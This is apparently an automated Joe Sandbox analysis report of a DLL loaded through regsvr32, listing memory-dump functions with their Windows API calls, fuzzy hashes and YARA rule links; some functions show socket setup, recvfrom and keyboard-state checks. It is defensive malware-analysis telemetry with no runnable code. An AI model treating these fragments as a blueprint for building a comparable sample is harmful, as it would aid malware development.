Part of subcall function 100248E2: __EH_prolog3.LIBCMT ref: 100248E9

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocH_prolog3H_prolog3_catchLocal_malloc
String ID:
API String ID: 1104862767-0
Opcode ID: fd7fb294918823335492a66fe64f990aaa4eeed4153628f3b589ca3afe8965ee
Instruction ID: a1f779584784c66b6c6d6693aa33ee417c0f7bf9ec3ebef889974536428868aa
Opcode Fuzzy Hash: fd7fb294918823335492a66fe64f990aaa4eeed4153628f3b589ca3afe8965ee
Instruction Fuzzy Hash: 87317AB4A05B40CFD761CF69904125EFBF0FF94700FA08A1EA19A87791CB71A640CB15

Uniqueness

Uniqueness Score: -1.00%

Function 1001FB60, Relevance: 1.6, APIs: 1, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memcpy_s.LIBCMT ref: 1001FBE6

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: _memcpy_s
String ID:
API String ID: 2001391462-0
Opcode ID: d3dc88160a5e56be7f368e8a08c7792e6ef88e5c4e6cc4fd85bb2cebbcebf868
Instruction ID: f5ed4905dd4460340b5ac9a4a0a7973f6bbe06acb99917e18be8531ceafe8f55
Opcode Fuzzy Hash: d3dc88160a5e56be7f368e8a08c7792e6ef88e5c4e6cc4fd85bb2cebbcebf868
Instruction Fuzzy Hash: EA3197B4E0060ADFCB04DF98C891AAEB7B1FF88310F148699E915AB355D730AD41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1002B0BB, Relevance: 1.5, APIs: 1, Instructions: 43
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 1002B0C2

Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: Exception@8H_prolog3Throw
String ID:
API String ID: 3670251406-0
Opcode ID: 4f981416dc5ef7bbdfecb2dfbb495584922b02ae1a1aa31fe3482948e2cc2218
Instruction ID: c80a5d1f5578f8721dbd374575b215f2d5835d67e27bcfac389e5dd05e3c6f9c
Opcode Fuzzy Hash: 4f981416dc5ef7bbdfecb2dfbb495584922b02ae1a1aa31fe3482948e2cc2218
Instruction Fuzzy Hash: FE017C386006438BDB26DF64DC6172E76E2EB843A1FA2442EE9518B291EF359D41CB40

Uniqueness

Uniqueness Score: -1.00%

Function 10008000, Relevance: 1.5, APIs: 1, Instructions: 41
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 1000800B

Part of subcall function 1002E654: __FF_MSGBANNER.LIBCMT ref: 1002E677
Part of subcall function 1002E654: __NMSG_WRITE.LIBCMT ref: 1002E67E
Part of subcall function 1002E654: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880), ref: 1002E6CB

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 9844e1e0ea7d25e2d8370f8d0841ec7162df559c8b01d3b16c313ebecebe2b95
Instruction ID: 9a20b1d8cf5172607ffba420905976db52b7852b2de11c78eab645b8586f80a8
Opcode Fuzzy Hash: 9844e1e0ea7d25e2d8370f8d0841ec7162df559c8b01d3b16c313ebecebe2b95
Instruction Fuzzy Hash: BD012CB4D08158EBEB00CFA4D85569EBBB4FB00394F108895D9516B305D376AB18DB91

Uniqueness

Uniqueness Score: -1.00%

Function 100236CE, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 100236ED

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: _malloc
String ID:
API String ID: 1579825452-0
Opcode ID: f1b84940060e793f2024458e4c8e5a4687c3363722e5127f1986a87a664482b3
Instruction ID: 890261fd43258a4c098dfe067f91bb2ba3d5f49a8a728e9457d7994589d2c75f
Opcode Fuzzy Hash: f1b84940060e793f2024458e4c8e5a4687c3363722e5127f1986a87a664482b3
Instruction Fuzzy Hash: 4CE06D766006156BC700CB4AE408A46BBDCDFA13B0F56C466E808CB252CAB1E8048BA0

Uniqueness

Uniqueness Score: -1.00%

Function 1002ACFB, Relevance: 1.5, APIs: 1, Instructions: 21
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_catch.LIBCMT ref: 1002AD02

Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
Part of subcall function 1002A6AB: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
Part of subcall function 1002A6AB: LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: CriticalSection$Enter$H_prolog3_catchInitializeLeave
String ID:
API String ID: 1641187343-0
Opcode ID: 66fe0e46e7327439d87287bd7a4e421fc252772a67af4eb91e5b37aeeae1f300
Instruction ID: 3b67d6bb43f4ea54dfbebb57807521158ddd2742ca645746548a7aae3598e2fb
Opcode Fuzzy Hash: 66fe0e46e7327439d87287bd7a4e421fc252772a67af4eb91e5b37aeeae1f300
Instruction Fuzzy Hash: F3E04F386442069BE760DFA4D846B4DB6E0EF01762FA04628F9D1EB2C2DF70AD80DB15

Uniqueness

Uniqueness Score: -1.00%

Function 10035645, Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,1002E896,00000001,?,?,?,1002EA0F,?,?,?,1004E6A8,0000000C,1002EACA), ref: 1003565A

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 11ed1c273bd328d3672869b0a3b6640a53f1cfb0cc5beffffd0de0ee24041fc5
Instruction ID: 0df5893edc33e170cd9319f6da52f4968d67da800731ff8b92bc7feba6a3d305
Opcode Fuzzy Hash: 11ed1c273bd328d3672869b0a3b6640a53f1cfb0cc5beffffd0de0ee24041fc5
Instruction Fuzzy Hash: 17D05E329507559EF7029F716C49B223BDCE384A96F048436F80CC61A0E670C6418A04

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1003C7D2, Relevance: 66.4, APIs: 44, Instructions: 432COMMONLIBRARYCODE

Download Yara Rule

APIs

___getlocaleinfo.LIBCMT ref: 1003C809
___getlocaleinfo.LIBCMT ref: 1003C81E
___getlocaleinfo.LIBCMT ref: 1003C833
___getlocaleinfo.LIBCMT ref: 1003C848
___getlocaleinfo.LIBCMT ref: 1003C860
___getlocaleinfo.LIBCMT ref: 1003C875
___getlocaleinfo.LIBCMT ref: 1003C887
___getlocaleinfo.LIBCMT ref: 1003C89C
___getlocaleinfo.LIBCMT ref: 1003C8B4
___getlocaleinfo.LIBCMT ref: 1003C8C9

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: ___getlocaleinfo
String ID:
API String ID: 1937885557-0
Opcode ID: 140fc5ec8b9a87e1cb2285073580b9a6ca86accc3e2e9ca1bcb8d5ec2949de64
Instruction ID: b04c4d7f6a57d8df90e79b3f21b47685716bac7d418787b81275d3872e324d7c
Opcode Fuzzy Hash: 140fc5ec8b9a87e1cb2285073580b9a6ca86accc3e2e9ca1bcb8d5ec2949de64
Instruction Fuzzy Hash: 0DE1DDB294060DBEEF12CAE1CC85DFFB7BDFB04744F14096AB255E6041EA71AB059B60

Uniqueness

Uniqueness Score: -1.00%

Function 10001160, Relevance: 10.6, APIs: 7, Instructions: 71networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(?,?), ref: 10001194
_memset.LIBCMT ref: 100011A8
htonl.WS2_32(00000000), ref: 100011C1
htons.WS2_32(?), ref: 100011D5
socket.WS2_32(00000002,00000002,00000000), ref: 100011EB
bind.WS2_32(?,?,00000010), ref: 10001210
setsockopt.WS2_32(?,0000FFFF,00001006,00000001,00000008), ref: 10001252

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: Startup_memsetbindhtonlhtonssetsockoptsocket
String ID:
API String ID: 1003240404-0
Opcode ID: 4267394abd7b2fe00b1ee463b318e0afc4881c9e2497cd05d0da4904e14a920c
Instruction ID: 8b71fe392eebb4791ef10e00b80357e65c28fbed0d3ec8f38f9f26760835bea4
Opcode Fuzzy Hash: 4267394abd7b2fe00b1ee463b318e0afc4881c9e2497cd05d0da4904e14a920c
Instruction Fuzzy Hash: D6317C74A01228AFE760CB54CC85BE9B7B4FF8A714F0041D8E949AB281CB71AD80DF55

Uniqueness

Uniqueness Score: -1.00%

Function 1002129B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

_strcpy_s.LIBCMT ref: 100212CD

Part of subcall function 100210FF: __CxxThrowException@8.LIBCMT ref: 10023B71
Part of subcall function 100210FF: __cftof.LIBCMT ref: 10023B88

Part of subcall function 10030D24: __getptd_noexit.LIBCMT ref: 10030D24

GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 100212E5
__snwprintf_s.LIBCMT ref: 1002131A
LoadLibraryA.KERNEL32(?), ref: 10021355

Strings

LOC, xrefs: 100212C5

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: Exception@8InfoLibraryLoadLocaleThrow__cftof__getptd_noexit__snwprintf_s_strcpy_s
String ID: LOC
API String ID: 1016519223-519433814
Opcode ID: 8ad2e179110c5fc4a63ba0c3a506fe82720806b71859df2b9a9481073aac2a1f
Instruction ID: e5882df6752d869781cd97db702e75e799ef83d3d4dcb43d327d0f518dc3dfd8
Opcode Fuzzy Hash: 8ad2e179110c5fc4a63ba0c3a506fe82720806b71859df2b9a9481073aac2a1f
Instruction Fuzzy Hash: A021063990121CAFDB11EBA0EC46BDD33EEEB05751F9004A1FA04DB491DB70AE45C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 1002DB0D, Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 10031D3A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 10031D4F
UnhandledExceptionFilter.KERNEL32(10049478), ref: 10031D5A
GetCurrentProcess.KERNEL32(C0000409), ref: 10031D76
TerminateProcess.KERNEL32(00000000), ref: 10031D7D

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 71874975056eb2054f9aced908419e2b906654dc85cf8b7fbf46a45a6eae212a
Instruction ID: eb2889493d924e234dee94db6a5018ee6042f58a5b7914c10149dcbc3be7d463
Opcode Fuzzy Hash: 71874975056eb2054f9aced908419e2b906654dc85cf8b7fbf46a45a6eae212a
Instruction Fuzzy Hash: C8219AB8C01A24DFF742DF68DDC96883BB4FB1C345F52102AE9088B665E7B06985CF15

Uniqueness

Uniqueness Score: -1.00%

Function 10027958, Relevance: 6.0, APIs: 4, Instructions: 42keyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 1002A3F0: GetWindowLongA.USER32 ref: 1002A3FB

GetKeyState.USER32(00000010), ref: 1002797E
GetKeyState.USER32(00000011), ref: 10027987
GetKeyState.USER32(00000012), ref: 10027990
SendMessageA.USER32 ref: 100279A6

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: a9509507a0c3cd732412f6ac1bfcc6ca4a4eab2c6e7fc2ddd7a5ec5eb68b4cea
Instruction ID: a80f2be592eaa4d0f51a0e10a6f75c43a55355dd3138243e3a8160c71d5bf3bd
Opcode Fuzzy Hash: a9509507a0c3cd732412f6ac1bfcc6ca4a4eab2c6e7fc2ddd7a5ec5eb68b4cea
Instruction Fuzzy Hash: 0AF0E93A7C035B66EA10E6707C81F950814FF45BD4FC11431BF49EA1D2DFA0C89119B0

Uniqueness

Uniqueness Score: -1.00%

Function 10021183, Relevance: 4.5, APIs: 3, Instructions: 40COMMON

Download Yara Rule

APIs

LoadResource.KERNEL32(00000000,?,?,1002120D,00000000,00000000,?,?,1002189A,00000000,?,?,?,?,10021950,00000000), ref: 1002118E
LockResource.KERNEL32(00000000,?,?,1002120D,00000000,00000000,?,?,1002189A,00000000,?,?,?,?,10021950,00000000), ref: 1002119C
SizeofResource.KERNEL32(00000000,?,?,1002120D,00000000,00000000,?,?,1002189A,00000000,?,?,?,?,10021950,00000000), ref: 100211AE

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: Resource$LoadLockSizeof
String ID:
API String ID: 2853612939-0
Opcode ID: 8b420e262c7312fbbd320bda05a88a884026fa2b8a5d750ea2b9a6c299d0f1d4
Instruction ID: 5885e8a255633e1cc81cd5e62f2e9d9df206611330dfebe0406f5a0ab521e5b9
Opcode Fuzzy Hash: 8b420e262c7312fbbd320bda05a88a884026fa2b8a5d750ea2b9a6c299d0f1d4
Instruction Fuzzy Hash: 7FF0F03A60013BA7CF219F69FC044E97BD5FF107E67414425FEA9C2060E231D870D680

Uniqueness

Uniqueness Score: -1.00%

Function 100250A3, Relevance: 4.5, APIs: 3, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d3cc7cabb4d58ad44b84df687ee6d4ed92987b137f1ec63db657d71093bb1ad
Instruction ID: 0d7c4b7ad1d73a1697217a780c63f05e975ccc5f711293de909a3a3b9b9d2103
Opcode Fuzzy Hash: 8d3cc7cabb4d58ad44b84df687ee6d4ed92987b137f1ec63db657d71093bb1ad
Instruction Fuzzy Hash: 16F0A431600109ABDF11DF60DD88A9E7FB8FF05346F908021FC1AC5061DB32CA55EB99

Uniqueness

Uniqueness Score: -1.00%

Function 10001280, Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

recvfrom.WS2_32(?,?,00000400,00000000,?,00000010), ref: 100012CF

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: recvfrom
String ID:
API String ID: 846543921-0
Opcode ID: cdd5b8fa6bd2be514b31e1496784718f03a02615474b077ae9b11ea931df357f
Instruction ID: 69fb0fddd724ab168ece224e86e76236123086ad7b1ad86b3e1ae6067053412b
Opcode Fuzzy Hash: cdd5b8fa6bd2be514b31e1496784718f03a02615474b077ae9b11ea931df357f
Instruction Fuzzy Hash: 1B0125B5A0011C9FDB14CF58CD54BEEBBB9FF88304F4045A9E609A7241D7B46A84CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 100214CB, Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 158libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 100214D5
GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,1002179C,?,?), ref: 10021505
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10021519
ConvertDefaultLocale.KERNEL32(?), ref: 10021555
ConvertDefaultLocale.KERNEL32(?), ref: 10021563
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10021580
ConvertDefaultLocale.KERNEL32(?), ref: 100215AB
ConvertDefaultLocale.KERNEL32(000003FF), ref: 100215B4
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 100215CD
EnumResourceLanguagesA.KERNEL32 ref: 100215EA
ConvertDefaultLocale.KERNEL32(?), ref: 1002161D
ConvertDefaultLocale.KERNEL32(00000000), ref: 10021626
GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10021669
_memset.LIBCMT ref: 10021689

Strings

GetUserDefaultUILanguage, xrefs: 1002150D
kernel32.dll, xrefs: 100214EE
ntdll.dll, xrefs: 100215C8
GetSystemDefaultUILanguage, xrefs: 10021565

Memory Dump Source

Source File: 00000005.00000002.290477961.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.290472749.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290526909.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.290534585.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290539601.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.290585542.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290590388.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.290603395.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 3537336938-2299501126
Opcode ID: 482ed3ff8adc9dfca9f4a6a5a3eecf6aee0f7f9e6cd518195f59097e54c4c985
Instruction ID: 3754a4cc769aa270db1ce7901eb040107ed5b3d0b04ae9dca27c5b132e5f9257
Opcode Fuzzy Hash: 482ed3ff8adc9dfca9f4a6a5a3eecf6aee0f7f9e6cd518195f59097e54c4c985
Instruction Fuzzy Hash: 77515974C002289BCB61DF659C44BEDBAF4EB59300F5002EAE988E3291DB749E81CF94

Uniqueness

Uniqueness Score: -1.00%

Function 10034610, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,1004E800,0000000C,1003474B,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C), ref: 10034622
__crt_waiting_on_module_handle.LIBCMT ref: 1003462D

Part of subcall function 1003065C: Sleep.KERNEL32(000003E8,00000000,?,10034573,KERNEL32.DLL,?,?,10034907,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F), ref: 10030668
